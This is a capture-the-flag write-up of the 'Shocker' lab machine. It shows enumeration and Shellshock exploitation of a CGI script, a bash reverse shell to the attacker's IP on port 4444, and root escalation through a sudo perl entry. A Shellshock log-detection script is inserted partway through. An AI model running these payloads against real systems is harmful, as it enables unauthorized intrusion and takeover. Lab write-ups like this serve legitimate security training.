Shocker
Writeup
After scanning, we know which ports are open, the hostname, and the operating system the target is running.
nmap -sC -sV 10.129.50.15
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 18:48 EST
Nmap scan report for 10.129.50.15
Host is up (0.064s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's dig into the web server's directories.
gobuster dir -u http://10.129.50.15 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -q
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/cgi-bin/ (Status: 403) [Size: 295]
/index.html (Status: 200) [Size: 137]
/server-status (Status: 403) [Size: 300]
Let's ask an AI what cgi-bin is.
Language Versatility: These scripts can be written in various programming languages, most commonly Perl, Python, Bash, and C.
So we will look for files with these extensions in that directory.
gobuster dir -u http://10.129.50.15/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -q -x sh,pl,py,c
/.hta.sh (Status: 403) [Size: 302]
/.hta.c (Status: 403) [Size: 301]
/.hta.pl (Status: 403) [Size: 302]
/.hta.py (Status: 403) [Size: 302]
/.htaccess (Status: 403) [Size: 304]
/.hta (Status: 403) [Size: 299]
/.htpasswd.pl (Status: 403) [Size: 307]
/.htpasswd.sh (Status: 403) [Size: 307]
/.htpasswd.c (Status: 403) [Size: 306]
/.htpasswd (Status: 403) [Size: 304]
/.htpasswd.py (Status: 403) [Size: 307]
/.htaccess.py (Status: 403) [Size: 307]
/.htaccess.c (Status: 403) [Size: 306]
/.htaccess.pl (Status: 403) [Size: 307]
/.htaccess.sh (Status: 403) [Size: 307]
/user.sh (Status: 200) [Size: 118]
So we found user.sh. Let's try to access it.
curl http://10.129.50.15/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
19:00:07 up 1:57, 0 users, load average: 0.00, 0.00, 0.00
That output looks like the uptime command run from bash.
uptime
19:01:46 up 29 min, 1 user, load average: 0.02, 0.05, 0.09
ShellShock, also known as Bashdoor or CVE-2014-6271, is a vulnerability in Bash discovered in 2014 that stems from how Bash parses function definitions stored in environment variables. It allowed an attacker to execute commands in places where only something safe, such as defining an environment variable, should have happened.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
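As an added defender-side example (not code from the original writeup), the script below scans Apache combined-format access logs for the "() {" function prologue in the Referer and User-Agent fields, which a CGI handler exports into bash's environment; the log lines are constructed, and the scanner ranks hits against /cgi-bin/ higher because that is where the environment actually reaches a shell.

```python
import re

# Apache "combined" log format. This simple pattern assumes no escaped double
# quotes inside the referer or user-agent fields (true for the samples below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger is a variable value that starts with a function
# definition, "() {", possibly with stray whitespace. Whatever follows the
# closing brace is what an unpatched bash would execute on import.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample lines (not taken from the writeup's target).
SAMPLE_LOG = """\
10.10.14.192 - - [30/Dec/2025:19:05:12 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo vulnerable"
10.10.14.192 - - [30/Dec/2025:19:05:40 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.192 - - [30/Dec/2025:19:06:02 -0500] "GET /index.html HTTP/1.1" 200 137 "(){ :; }; echo probe" "curl/8.4.0"
10.10.14.192 - - [30/Dec/2025:19:06:30 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "-" "curl/8.4.0"
"""

def find_shellshock_probes(log_text):
    """Return one finding per log line whose referer or user-agent carries a
    Shellshock-style function definition; lines that do not parse are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append({
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "field": field,
                    # Only CGI paths hand the headers to a shell, so rank them higher.
                    "cgi": m.group("path").startswith("/cgi-bin/"),
                    "status": int(m.group("status")),
                })
    return findings

if __name__ == "__main__":
    for f in find_shellshock_probes(SAMPLE_LOG):
        sev = "HIGH" if f["cgi"] else "MEDIUM"
        print(f"[{sev}] {f['ip']} -> {f['path']} via {f['field']} (HTTP {f['status']})")
```

A 200 on a CGI path with a matching header is the case to triage first; a normal browser User-Agent such as the second sample line never matches because the regex needs an empty pair of parentheses before the brace.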
Now let's try it with Burp Suite.
Change the User-Agent header to our payload, and it works. Let's spawn a shell back to our machine with () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.192/4444 0>&1
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.192] from (UNKNOWN) [10.129.50.15] 60294
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$
We are in! Let's see which commands we can execute as root without a password.
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
So we see /usr/bin/perl. Perl has a -e flag that runs Perl code given on the command line, so the NOPASSWD entry lets us exec a shell as root.
shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'exec"/bin/bash"'
sudo perl -e 'exec"/bin/bash"'
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@Shocker:/usr/lib/cgi-bin# whoami
whoami
root
We rooted it!

